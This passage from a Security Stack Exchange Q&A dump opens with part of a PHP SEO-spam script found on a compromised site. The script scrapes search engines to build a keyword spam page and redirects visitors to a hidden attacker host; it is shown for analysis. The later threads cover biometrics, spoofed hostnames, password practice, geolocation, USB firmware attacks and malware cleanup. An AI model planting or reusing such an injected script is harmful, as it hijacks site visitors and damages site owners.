exit; } //if (!strpos($_SERVER['HTTP_USER_AGENT'], "google")) exit; while($tpl == 0) { $tpl_n = rand(1,9); $tpl = @file("tpl$tpl_n.html"); } $keyword = "1 euro terno su tutte vincita "; $keyword = chop($keyword); $relink = "<UL></UL>"; $query_pars = $keyword; $query_pars_2 = str_replace(" ", "+", chop($query_pars)); for ($page=1;$page<3;$page++) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.ask.com/web?q=$query_pars_2&qsrc=11&adt=1&o=0&l=dir&page=$page"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); $result = str_replace("\r\n", "", $result); $result = str_replace("\n", "", $result); preg_match_all ("#web-result-description\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; } $mas1 = array("1", "2", "3", "4", "5"); $mas2 = array("11-20", "21-30", "31-40", "41-50", "51-60"); $setmktBing = "US"; $lang = "US"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://search.yahoo.com/search?p=$query_pars_2"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; // echo $result; // exit; sleep(1); foreach ($mas1 as $var=>$key) { $link = ""; preg_match_all ("#<strong>$key</strong><a href=\"(.*)\" title=\"Results $mas2[$var]\"#iU",$result,$mm); $link = str_replace('<strong>'.$key.'</strong><a href="', "", $mm[0][0]); $link = str_replace('" title="Results '.$mas2[$var].'"', "", $link); if (strlen($link)<5) continue; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$link"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; sleep(1); } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://www.google.com/search?q=$query_pars_2&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); $result = str_replace("\r\n", "", $result); $result = str_replace("\n", "", $result); //echo $result; preg_match_all ("#<span class=\"st\">(.*)</span>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; $text = str_replace("...", "", $text); $text = strip_tags($text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = explode(".", $text); shuffle($text); $text = array_unique($text); $text = implode(". ", $text); $html = implode ("\n", $tpl); $html = str_replace("[BKEYWORD]", $keyword, $html); $html = str_replace("[LINKS]", $relink, $html); $html = str_replace("[SNIPPETS]", $text, $html); $out = fopen($myname, "w"); fwrite($out, $html); fclose($out); echo $html; } if(!@$isbot) { $s = dirname($_SERVER['PHP_SELF']); if ($s == '\\' | $s == '/') {$s = ('');} $s = $_SERVER['SERVER_NAME'] . $s; header("Location: http://$ard/input/?mark=20160624-$s"); //header("Location: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); exit; } ?> In my understanding, the code does the following: 1) Check if it gets executed by a bot - if so terminate 2) decrypt the hidden IP 3) create a search term in a very useless way? 4) Make three curl search requests to yahoo, google and ask.com 5) get the data from those search requests, only take certain information 6) write those information into a file? In my best understanding thats what the program is doing, but I don't get what the harm is ? Why would someone go through the hassle to find a website to sneak this on to? or am i missing anything critical in this script? Thanks for all your help!
(I haven't gone over the code, I'm speculating because your description fits the modus of some malware I've seen in the past.) It's probably a bot that is trying to build a network of backlinks to a known group of web assets. Basically they find a vulnerable site and pop it. From there the script does a search to find which of the attacker's assets are currently ranking highest (or lowest) and haven't been penalized by Google/et al. yet. They promote their assets further by implanting top keywords and links to those sites into an HTML document that gets served from your domain. Now when Google indexes your site, they see you are endorsing their sites and they rank even higher in the search results. It's pretty clever. It's toxic to you though because when Google penalizes spam farms, they also penalize sites that link to them. Your SEO will probably will take a hit if/when judgment day comes. Remediate this ASAP.
{ "source": [ "https://security.stackexchange.com/questions/136966", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124572/" ] }
136,971
An associate of mine has asked my help because he is being fined $1000 because a web application he uses in his line of work claims he's shared his logon credentials with someone else, violating their terms of service. He claims he's not done this. The site claims they know there are multiple humans using his password because they use keystroke dynamics during the logon process. To quote their auditor: "The main factor on your account is multiple typing patterns, which indicate multiple users." The auditor provided an audit of login events which I've reviewed. It shows 5 unique "keystroke IDs". They only track successful logons and use of the Backspace key clears the entire password forcing re-entry from scratch. I believe they use a browser plug-in to capture the data. What doesn't make sense is that all of the logons came from my associate's laptop from only two public IP addresses: his office and his home. Of the 5 keystroke IDs, 4 happened at work. Interestingly, 4 of the 5 patterns were also present in logons made from his home. I think these patterns are all being generated by my associate, but I'm not familiar with keystroke dynamics enough to explain how it could generate false-positive results. Is it true that multiple typing patterns indicate multiple users? If not, what could explain one person having multiple patterns?
A common theme with biometric authenticators is that they are based on bodily features or behaviors which have inherent variability. Most authentication systems do a couple of things to reduce the rejection of valid users. First, these systems allow a defined amount of variability when comparing biometric samples. In other words, they acknowledge that you won't type your password exactly the same way every time (in fact some systems look at exact matches as an indicator of a replay attack). There is usually a threshold within the system to still allow authentication if the supplied biometric sample is 'close enough'. Make the system less forgiving and you increase your False Rejection Rate (FRR), which means legitimate users aren't authenticated. In this case the FRR may actually indicate that the user was successfully authenticated but a new 'keystroke ID' was generated. Make the system more forgiving and you increase your False Acceptance Rate (FAR), which means unauthorized users are more likely to be misidentified. Sometimes this control can be adjusted by the system administrators to meet their unique deployment needs, and other times the vendor/developer hardcodes in a value that they feel works best for most users. Second, these systems need to capture a sufficient number of samples from the authorized user in order to create an accurate biometric template. This is more important for a biometric like keystroke dynamics where your typing will change from entry to entry. The more samples this template is based on the better it works with the first control that compares whether new authentications are within the margin of error of the authorized user template. What we don't know, and may not be able to find out, is how these two elements are handled by the service your friend uses. It's possible they tuned their system to reduce the FAR so much that variations in how he types during subsequent logins are generating different 'keystroke IDs', despite it really being him. This research paper on keystroke dynamics lists their FRR at around 5%. In the context of this service that might mean a similar FRR would generate a different keystroke ID for your friend's valid logins in 1 out of every 20 logins. We also don't know how many logins they used to train their system for his valid biometric template. They may have just used his initial password entry during account setup. Or they may have trained the system using a few dozen of his logins before looking for unauthorized use. Clearly the second approach is the one they should have used in order to improve the quality of their biometric template. Unless this is a new system or a shady vendor, I would assume that they'd have already fixed these problems since they would presumably affect all of their customers and cause a lot of complaints. But it's also possible that you friend just has more variation in his password entry technique than normal users. I agree with Johnny's answer that having different keystroke ID profiles is just one indicator that the vendor should use to determine if fraud is occurring. Without details on their particular biometric system it is possible that he is solely responsible for all of these logins and is mistakenly being accused of violating the ToS. He should ask them for more information beyond just the source IP and keystroke ID of the logins, or make the argument that the evidence they've supplied so far is flimsy.
{ "source": [ "https://security.stackexchange.com/questions/136971", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46200/" ] }
137,098
Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided. Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this: Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 2.6.32-042stab116.2 x86_64) Documentation: https://help.ubuntu.com/ Last login: Sat Sep 17 04:39:57 2016 from ic.fbi.gov Immediately, I contacted my hosting company. They said that they didn't know why this might be, and that it's possible the hostname was spoofed. I did a bit more digging, and resolved ic.fbi.gov to an IP address. I then ran this on the system: last -i This returned my IP address, and then two other IP addresses which were unknown to me. I geoIP'd these two IP addresses. One of them was a VPN and the other was a server from a hosting company in the state of Washington. Again, the IP that I resolved ic.fbi.gov to was not on the list. Do you think I should be concerned/worried about the "FBI" obtaining access to my VPS? Or is it just a hacker that spoofed the hostname?
An IP address can be set up in DNS to resolve to any host name, by whoever is in control of that IP address. For example, if I am in control of the netblock 203.0.113.128/28, then I can set up 203.0.113.130 to reverse-resolve to presidential-desktop.oval-office.whitehouse.gov . I don't need control of whitehouse.gov to do this, though it can help in some situations (particularly, with any software that checks to make sure reverse and forward resolution matches ). That wouldn't mean that the president of the United States logged into your VPS. If someone has access to your system, they can change the resolver configuration which will effectively enable them to resolve any name to any IP address, or any IP address to any name. (If they have that level of access, they can wreak all kinds of other havoc with your system as well.) Unless and until you verify that the IP address that was used to log in actually is registered to the FBI, don't worry about the host name being one under fbi.gov . That name mapping may very well be faked. Worry instead that there has been a successful login to your account that you cannot explain, from an IP address that you don't recognize. Chances are that if the FBI wanted the data on your VPS, they would use a somewhat less obvious approach to get it. You should worry, but not about the fbi.gov hostname. Go read How do I deal with a compromised server? on Server Fault, and How do you explain the necessity of “nuke it from orbit” to management and users? here on Information Security. Really, do it. Do it now; don't put it off.
{ "source": [ "https://security.stackexchange.com/questions/137098", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124741/" ] }
137,320
We have been told when creating passwords/ keys etc. to never use a different language/ characters to create it ie. a mandarin keyboard, as it greatly decreases the strength. Why is this?
In general, there is no reason not to use arbitrary characters in a password, unless the system processing the password does something stupid with them (like removes them completely, leaving an empty password). In the bad old days of language-specific character sets, there was always the risk that a password with non-ASCII characters might stop working when you switched to a different computer, because it was encoding those characters differently. But nowadays everybody's pretty much standardized on Unicode as the standard universal character set, so that reason rarely applies unless dealing with old legacy systems. (Of course, we still have different ways of encoding Unicode characters into bytes, like UTF-8, UTF-16-LE/BE, UCS-32, etc., but at least those are generally pretty well under the receiving program's control, as opposed to depending on the user's OS and/or terminal settings like charset selection used to be. And, honestly, UTF-8 is becoming pretty well established as the standard Unicode encoding for I/O purposes, even if some software may use other encodings internally.) In fact, using characters from a wider pool makes it harder for an attacker to guess your password by brute force. That said, making the password slightly longer generally does that more effectively than sprinkling "weird" characters into your password ( obligatory xkcd link ), so you should only use non-English characters in your password if you can type and remember them easily, e.g. because you speak a language that uses those characters. Still, there are some reasons why you might sometimes not want to use non-ASCII characters in your password: They might not be easy to type , if you ever need to log in from a shared / borrowed computer with a different keyboard, or if your own computer's keyboard layout gets switched for some reason. (Actually, the same goes for ASCII punctuation too, since a lot of keyboard layouts like to switch those keys around. But at least you usually can type them on any keyboard.) The system processing the password might not accept them. People have funny ideas about what counts as a valid password, and especially some older systems (and especially if they were developed in the US) might simply refuse to accept anything but printable US-ASCII characters in passwords. They might even have sort-of-valid reasons for doing that, e.g. if the passwords are internally passed between old legacy systems that use different character encodings, or that break on non-ASCII data in some way (see below). Even on the client side, some of those old charset issues might still rear their head. For example, if the password is typed into an HTML form on a web page, and if the page does not explicitly specify its character encoding, different browsers might auto-detect different encodings , causing the password (and any other text entered into the form) to be encoded differently. For some writing systems, Unicode normalization could also cause problems. Without going into details, there are several equivalent ways to represent many characters in Unicode. If the password processing system does not explicitly run the password through a Unicode normalization algorithm before hashing it (and many do not), then it's possible that typing the same character on different computers might result in a different sequence of Unicode code points, causing passwords using that character not to match. If the back-end that handles the passwords was never designed or tested with anything but ASCII characters, it might also simply break when given input it doesn't expect. For example: Different parts might handle non-ASCII characters differently. You might expect that all password processing in a given system would go through the same code, but in practice, there could well be multiple implementations password hashing (e.g. for different user interfaces to the same back end data), and they might not agree 100% on unexpected inputs. This could e.g. mean that your password might work over the web, but not with a native client app, or vice versa. The system might strip away non-ASCII characters , or even truncate the password at the first such character. You'd think that would be a crazy thing to do for a password (and it is!), but the system might e.g. be running all input through some generic "input sanitization" function that simply strips away anything it doesn't recognize as "safe". In most cases, that's not a terrible security measure to take (even if it would generally be safer to signal an error instead of silently discarding data); for passwords, it could be disastrous. The system might internally use non-ASCII characters as delimiters , on the assumption that those characters will never appear in real data. That might seem like a silly thing to do, but I've seen it done, including here on Stack Exchange . At best, such as design would force the system not to accept such characters in the delimited data; at worst, using such characters could cause the data to be truncated or garbled. Obviously, that could be really bad for a password. (Of course, some systems may do this with ASCII delimiters, too, leading to silly restrictions like "password may not contain @ or % ".) The system might limit the password length. A lot of old password hashing schemes (and even some relatively modern and otherwise seemingly decent ones, like bcrypt from 1999) will not accept passwords longer than some number of bytes, and may even silently truncate passwords longer than the limit. This is a potential security problem in general, but it can be exacerbated by the use of a variable-length encoding like UTF-8, where non-ASCII characters take up two or more bytes per character. Thus, for example, a system that limited passwords to 16 bytes of UTF-8 could handle a 16-character ASCII password, but only 8 characters of e.g. Greek or Cyrillic text. The upshot of all this is that, in general, using only printable US-ASCII characters in a password is least likely to trigger software bugs or limitations. Given that password handling bugs can often be difficult to deal with (since the only response you'll often get is "invalid password"), a lot of people may find it easiest and safest to stick to them. If you do want to use a non-ASCII password (e.g. to make yourself less of an easy target for brute force password cracking, or just because it's easier for you to type and remember), you may want to test that the system really handles your password in a (reasonably) sane way. I would suggest testing at least: that you can log in with your password (using all available login methods, if the system offers several, and with all browsers or other clients you're likely to use); that all features linked to your password (like, say, encrypted storage) really work correctly; and that you cannot log in with simple variants of your password, e.g. with some non-ASCII characters changed or with extra characters appended to the end. In any case, there's an argument to be made that, at least in 95% of all cases, you should not be choosing your own passwords anyway. Rather, you should be using a secure password manager, and letting it generate random passwords for you. Such randomly generated passwords will typically be long strings of random printable ASCII characters, to maximize entropy while minimizing potential compatibility issues, but it really doesn't matter much since you don't need to type or memorize them yourself. Of course, you do still need to choose a password for your password manager. But hopefully your password manager, at least, is well written and will handle non-ASCII passwords correctly.
{ "source": [ "https://security.stackexchange.com/questions/137320", "https://security.stackexchange.com", "https://security.stackexchange.com/users/140149/" ] }
137,418
Whenever I open the Google Maps app on my Android mobile phone, Google always seems to know my location, and it is very accurate (usually it places me on the map even in the correct room). Also, this happens even if both WiFi adapter and GPS are off. I know WiFi adapter off doesn't really mean anything, and I have heard Google uses information about nearby routers to geolocate you. But doesn't this mean ISPs are providing Google all (or some) of their routers' location? As far as I know, no private company aside from my ISP should know sensitive data like my location, name, etc ... So, how does Google locate me so precisely?
Google uses BSSID information from your WLAN Access Point to get an approximation of where you are located, even with GPS and WiFi turned off . Taken from “How does Google Maps estimate my location without GPS?” : Google and others like Apple and Skyhook build a Database which links WLAN BSSIDs to a geographic location. A BSSID is like the MAC address of a access point that gets broadcasted by that access point. It is therefore "public viewable" if the BSSID broadcast is enabled, which is the default for most access points. The BSSID operates on a lower layer as the IP stack, you don't even have to be connected to an access point to receive these broadcasts. So, essentially, when you ARE using WiFi and GPS, Google's database of BSSIDs is updated with a geographic location associated with that BSSID, as you've assumed. In your case, your AP is sending beacons advertising its BSSID, and because it is already in Google's database, Google Maps knows where you are based on the location of that AP. So it's not that the ISP is giving Google the location of their routers , it's that your phone has already helped to build a database of the Access Points around you, and Google uses this data for geolocation. Sadly, even if you get a new router and keep any and all Android devices away from it, they will still be able to approximate your location based on the cell towers your phone connects with (or maybe even your neighbor's AP!), but it won't be nearly as accurate. I saw in the comments questions about whether or not Android phones will receive location data even with WiFi turned OFF . The answer is, yes, absolutely they can. I'm sorry I didn't make that clearer. Better check your settings if you were unaware: This "feature" has been included since Android 4.3 , and prior versions of the Android OS do not include this feature . Thanks to martinstoeckli for this information. Although turning off this "feature" on your phone seems like the best way to prevent your BSSID from being added to the database, this isn't necessarily the case . You've got other people's phones, the phones of passers-by, and even Google's own Street View cars to contend with . Thanks to Bakuriu for pointing this out. Though this may be the case, you can opt out of your involvement in this program by appending _nomap to the end of your SSID . Your SSID is the "name" of the network that you have chosen or have been given . For example, you connect to the SSID "Home" or "D-Link" for your WiFi at home. In order to opt out you would rename your network Home_nomap or D-Link_nomap . Thanks for the tip Andrea Gottardo. For more, refer to the Google Support article about opting out.
{ "source": [ "https://security.stackexchange.com/questions/137418", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102582/" ] }
137,496
I read a BBC article about empty USB sticks containing malware: Berlin-based researchers Karsten Nohl and Jakob Lell said a device that appeared to be completely empty could still contain a virus. How can "empty" USB sticks contain malware? Is this only a problem for (legacy) Windows systems? Is there some way to use these sticks while protecting yourself? This question may seem similar to other questions but those have not concerned empty sticks.
You can hack the firmware of a USB device. With that you can tell the OS whatever you want, eg. the device is empty even it is not. Or attack the USB software stack of the OS by sending data that a normal USB device would not send (so the device could even really be empty, the attack comes from the firmware). You can also do other funny stuff, like tell the OS that the USB device is also a keyboard, then automatically type commands that do something if it is plugged in. Or tell the OS the USB device is a network card, and redirect all traffic to a server you control. Endless fun with hacked USB firmwares...
{ "source": [ "https://security.stackexchange.com/questions/137496", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20225/" ] }
137,641
Facebook stores old password hashes (along with the old salt), such that if you try to log in with a previous password, Facebook tells you that you updated the password (and when). Nice user experience. Except this site isn't ux.stackexchange.com . So, what security threats are presented by this? See also about Facebook storing old passwords here and here .
The other answers look pretty reasonable, but I wanted to add a few possibilities. If an attacker recovers one or more of your passwords from other breaches, it seems like plugging them into Facebook's UI could leak at least a few types of information: Whether you used the password on multiple services or not. With known disclosure dates for the breach, they could also gain a data point on how long it took you to update the password. If pattern-matching on recovered passwords suggests a likely iterator or mutation pattern in your password, it also seems like an attacker could also try one or two passwords they haven't seen in order to support or refute a thesis about how your passwords evolve over time. I would guess any attacker is somewhat limited in how many such tests they could attempt without someone noticing, but it seems like information along these lines could inform heuristics for how known users change their passwords, improve statistics on how common different update patterns are, and help hone priority lists of users/accounts that are most vulnerable. These seem like fairly small risks at the individual level, but it also seems like ( Martin Bos' post on cracking hashes in the LinkedIn breach is instructive) small heuristic improvements turn into pretty nice levers for recovering more passwords in a large scale breach while simultaneously improving the heuristic/lever.
{ "source": [ "https://security.stackexchange.com/questions/137641", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59522/" ] }
137,682
Someone is claiming to have sent me an email to my Hotmail account. I never received this email. They have forged an Outlook email showing the date and time that it was sent. How can I prove that their claim is forged?
The SMTP logs of Hotmail, their provider or any trusted third-party involved in delivering the email could confirm if their servers did or did not process it. (There is no guarantee that logs are available and likely you won't be given that information without a court order.) But either way you won't be able to prove that they forged it . That's because there are plenty of ways an e-mail can get lost . It might very well be an accident and from their point of view it's equally hard to prove that the email has actually been sent .
{ "source": [ "https://security.stackexchange.com/questions/137682", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125320/" ] }
137,796
The JP Morgan Chase homepage has a 5 second delay before login form appears. If you refresh the delay is always there. If you fail to input a proper password, the failed login page has no such delay when the page is loaded, regardless of how many refresh requests. Is the homepage implementing some sort of security measure?
Is the homepage implementing some sort of security measure? If you are referring to https://www.chase.com , then nope, it's just slow to load and do the transition thing. Terrible UX maybe, but this is not a security feature. A login cracking bot would not typically use the user interface anyway. Basically, it's a banking website, and terrible UX is sadly the norm. While this particular case may not be security related, it's not uncommon to have rate-limiting between login requests. This would have to be implemented in the back-end code to effect all requests to be effective.
{ "source": [ "https://security.stackexchange.com/questions/137796", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123386/" ] }
137,845
We are building a web app where users can insert 6 letters/digits (A_Z, 0-9) into a form to access a document. Every document has a randomly assigned access code like this: 1ABH5F. When the user inserts a valid code, the document is shown. There is no user login (no authentication) - it is open to the public. The front end will access the document via a stateless API - the code will be sent to the API, which will return the document. How should we implement information security? Nobody here is a security expert, but we were thinking like this: Using a captcha on the front end Limiting calling the API from a single IP more than 3 times/hour What other things do we have to implement to prevent access to the documents? I guess it is very important to specify the use case for this system: It is a system for anybody holding this document to see the original (digital) document. It will be used in an environment where users can print the documents (for example: car dealer) and bring it to other companies (for example: car registration office). The problem here is, that users can (and DO!) falsify the printed documents, then bring them to other companies (car registration office). These other companies have to have a way to check if the original is the same as the printed version. Since we do not know which the other companies are (any of 10000+ car registration offices), any person holding/viewing the 6 letter token can access to the original document.
Brute forcing So you have an alphabet of size 36 and 6 characters. That gives you about two billion different tokens. Lets say you have a thousand different documents. That gives you a chanse of one in two million of guessing a token associated with a document. Trying from a thousand different IP:s every hour for a year would give you almost ten million guesses - that should give you a couple of documents. Sure, the CAPTCHA makes this harder. But they are not perfect, and they can always be cracked by humans . The problem here is that since you only enter a token and no document ID you can only rate limit on IP and not on document. That makes it very hard to protect against brute forcing unless you have a very large space to pick tokens from. Sharing A password is personal and you are encouraged not to share it. That means it can be easily changed if it is compromised, and you have some control over who gets their hands on it. A document token like this is supposed to be shared by design. You have very little control over who gets it. It will end up on mailservers and backups and post its on peoples desktops all over the world. You have no idea who has access to the token, and if you need to change it you will need to redistribute it to all the persons who are supposed to have it. That is neither secure not practical. Conclusion: There must be a better way This will not give you very good security. If the resource you are protecting is not very important it might be enough, but I would not use it for anything of value. I do not know your exact use case, but whatever it is there must be a better way to solve this problem than rolling your own API. Using an existing solution would also save you the problem of having to write your own code. Use an existing cloud storage service, a VPN connection into the company intranet, or something else. Just don't fire up your IDE and start coding away. Update: Your use case This is one of the cases where an access token is probably a good idea. But to get around the problems mentioned above I would do this: Keep both the CAPTCHA and the rate limit by IP. (You might want to reconsider how the rate limiting is done in order to prevent accidental or deliberate DOS.) To deal with the brute forcing, I would increase the size of the token. Google Drive uses 49 characters with both upper case letters, lower case letters and numbers. That should be enough for you as well. To get around the sharing issue, print the URL with the token in a QR-code on the document itself. This brings the hole problem into the domains of physical papers that peoplpe are used to dealing with. The people who see the paper will have access to the digitial original. That is easy to grasp. Consider setting a limit on how many times the document can be accessed, or at least a maximum time for how long the token can be used. If the car should be registered within one week, there is no reason for the token to work after two. Do not store the tokens in plain text in your database. Hash them. (Something fast like SHA256 should be enough here - no need to roll out bcrypt when you have large random tokens.) Use a CSPRNG to generate the tokens, otherwise they could be guessed by an attacker having access to a few tokens.
{ "source": [ "https://security.stackexchange.com/questions/137845", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124355/" ] }
137,846
IT workers are usually trusted by their family members who readily share passwords (Facebook, email, twitter, you-name-it !) so they can get easy help to set what-ever-parameter they don't find or explanation of a challenging situation. I always try to convince and explain why this is a bad practice and that I do not want to know their password. However, I usually fall short on argument when I get answered " But I know I can trust you " or " I know that you will not use this for evil acts " to which I can't really reply " You don't know " as it would imply they can't trust me (remember, they are family members). What list of arguments (the longer, the better) do you use to explain the risks of having such bad practice? Here is my own small list: That's a bad practice and you should not trust anyone with. That's not respectful for the people sharing intimacy with you (you gave me your Facebook password, I have now access to all the very personal details of people that trust you and not me ). That's a responsibility I do not want that you force on me. If I use this password carelessly (i.e., without checking over my shoulder) someone can read this password and I would be the one that leaked it. Most of them usually don't understand, become suspicious or just assume that we are just paranoid. Please, avoid cases when harm is done using passwords. While this is mostly funny or creative, that does not answer to my answer where people trust you and this must be kept as is. Note though, that the comments stating you didn't realize they'd find what you did a problem or changing the password by a secure one and sending the password reset link are somehow valid in a way ;)
The nice and educational way This is a bit similar to your third bullet point. Nobody else should know your password, not even people you trust. That is the only way you can be sure only you have access to your account. Let's say you give me your Facebook password and a week later rumors start spreading about what you did in Las Vegas last year. Only a few people you trust knows that, and well, potentially me since I have your Facebook password. If that happens, I do not want to be a suspect. I do not want to be in a position where every privacy-related incident that happens to you could have been because of me. Giving information they should not have to people you trust can end up destroying that trust instead of reinforcing it. If countered with "but I really do trust you completely", highlight that the person also completely trusts Eve and Mark, the only two persons in the world who know about the Vegas incident, and if the word gets out clearly someone trusted must have broken the trust. A key message is this: I do not want to be party to all your secrets. If need be, make up a white lie about a friend of yours who got in trouble in a similar scenario to make it more concrete. The not so nice and educational way To teach people not to share their password, I post all passwords people give to me on Twitter. No exceptions. If you give me your Facebook password, within five minutes it will be on Twitter together with your username. [Open up Twitter and get ready to type.] If you still want to give it to me, that is fine, but you have been warned. This is probably not a good idea since you should not make threats you are not prepared to deliver on, and you should not deliver on this threat. But sometimes I am tempted... Reversing the roles Sometimes it is easier to understand someone else's position if you reverse the roles. Give the person a sealed envelope and say this: This envelope contains a piece of information that would completely ruin my career, my marriage, my life if it ever came out. You must hold on to this envelope forever, and make sure that nobody - including you - ever see what is inside. But don't worry, I trust you completely. When they refuse to take the envelope, explain that you don't want their Facebook password either.
{ "source": [ "https://security.stackexchange.com/questions/137846", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125577/" ] }
138,305
Is it safe to display the detailed query in the error webpage with the below details? **INSERT statement conflicted with the FOREIGN KEY constraint "ABC". The conflict occurred in database ** The statement has been terminated.[INSERT INTO ** ] ** I know that showing this kind of error will help penetration testers and hackers, but I need someone to shed lights on this. How can this information be used for SQL injection or that kind of things? Or is it okay to display such sensitive information?
End users should never get to see the gory details of your environment. Instead it is more professional to show a generic 'Sorry something went wrong' page. At least visitors can see that you have a real error handling mechanism present on your website. However those errors should be written to the mysql error log and should also trigger a notification by E-mail or otherwise to the IT team. Those errors should not happen so it can be a sign that your site is failing or is possibly under attack.
{ "source": [ "https://security.stackexchange.com/questions/138305", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34735/" ] }
138,438
In my home I have a router protected with WPA2-PSK (WPA2 Personal), using the passphrase. When I try to log in to a page over the Internet (this page does not use HTTPS to log me in), all my data is sent in clear text (since I can see the password I typed in Wireshark). Why is that? I mean, my WiFi is protected, so all the communication should be encrypted, right?
I mean, my WiFi is protected, so all the communication should be encrypted, right? It is, but not at the place you're reading it. Encryption happens at a certain point in the "pipeline", and decryption then must also happen at a certain point in the "pipeline" (otherwise the data are useless). You are observing the data after they have been decrypted, which would not be possible if you were using HTTPS (which instead provides end-to-end encryption, which starts at the server and ends at the browser). If you attempted to use Wireshark to capture the contents of an HTTPS transaction, it'd be like this: +--------+ (encrypted) +----------+ (encrypted) +--------+ | Server | ----------->| Internet |------------>| Router | +--------+ +----------+ +--------+ | | (encrypted) +------------------+---+ | Your PC | | | +-----------+ (e)| | | | Browser |<---+ | | +-----------+ | | | +-----------+ (e)| | | | Wireshark |<---/ | | +-----------+ | +----------------------+ Here, your browser knows how to decrypt the data, because it "owns" the HTTPS transaction in the first place; your Wireshark instance (which, per the very purpose of end-to-end encryption, is treated just like any other snooper in this scenario) does not. But your wireless encryption starts at the router and ends at the PC's network card, so the result for you is more like this: +--------+ (plaintext) +----------+ (plaintext) +--------+ | Server | ----------->| Internet |------------>| Router | +--------+ +----------+ +--------+ | | (encrypted) +------------------+---+ | Your PC | | | +-----------+ (p)| | | | Browser |<---+ | | +-----------+ | | | +-----------+ (p)| | | | Wireshark |<---/ | | +-----------+ | +----------------------+ Here, anything on your PC can read the data, because they were decrypted by your network card. Otherwise, what application would decrypt the data? Nothing would work. There is almost no relationship between HTTPS and WPA2-PSK; they do completely different jobs.
{ "source": [ "https://security.stackexchange.com/questions/138438", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126091/" ] }
138,606
This is an attempt to ask a canonical question as discussed in this old meta post . The goal is to create something helpful that can be used as a duplicate when non experts ask about virus infections. Let's say that I have determined beyond doubt that my home PC is infected by a virus. If necessary, you can assume that my computer runs Windows. Answers aimed at the non-technical reader are encouraged. What do I do now? How do I get rid of the virus? Do I really need to do a full reinstall? Can't I just run a couple of anti-virus programs, delete some registry keys, and call it a day? I really don't have time to deal with this right now. Is it dangerous to keep using the computer while it is infected? I don't have backups of my family photos or my master thesis from before the infection occurred. Is it safe to restore backups made after the infection occurred? Do I need to worry about peripherals getting infected? Do I need to do anything about my router or other devices on my home network?
What do I do now? How do I get rid of the virus? The best option is what is referred to as " nuke it from orbit ." The reference is from Aliens : The idea behind this is that you wipe your hard drive and reinstall your OS. Before you do this, you should make sure you have the following: A way to boot your computer off installation media. This can be in the form of the Install CD that came with your computer, or a DVD you burnt from an ISO file (Windows can be downloaded legally here ). Some computers do not have CD-ROM drives anymore. Microsoft provides a tool to convert their ISO files to bootable thumb drives . Do not create the install media on the infected computer. Your Original Windows License Key. This can either be on a sticker on the side of your computer or you can recover it from your computer a program like The Magical Jelly Bean Keyfinder (which might contain malware, but it really doesn't matter because you are wiping it all after you get the key anyway). Or an official tool supplied with Windows called slmgr.vbs . Drivers. If you don't have a second computer, you are really going to want to have at the minimum video drivers & network card drivers. Everything else can be obtained online after you reinstall. Any files you want to save. You can back them up to a thumb drive for now, and scan them before putting them on your freshly installed machine (see below). Do I really need to do a full reinstall? Can't I just run a couple of virus programs, delete some registry keys, and call it a day? In theory, it is not always necessary to fully reinstall. In some cases you can clean the virus off the hard drive without a full reinstall. However, in practice it's very hard to know that you have gotten it all, and if you have one virus it is likely you have more. You might succeed in removing the one that causes symptoms (such as ugly ad popups), but the rootkit stealing your password and credit card numbers might go unnoticed. The only way to kill everything is to wipe the hard drive, so your best option is always to nuke it from orbit. It's the only way to be sure. I really don't have time to deal with this right now. Is it dangerous to keep using the computer while it is infected? You may not have time for it right now, but you really don't have time for your email getting hacked and your identity being stolen. It's best to take the time to fix it now and fix it right before the problem gets worse. While your computer is infected all your keystrokes might be recorded, your files stolen, it might even be used as a part of a botnet attacking other computers. You do not want this to be going on for longer than necessary. If you really don't have time to deal with it right now, power down the computer and use another one until you have time to fix it. (Be careful with file transfers from the infected to the 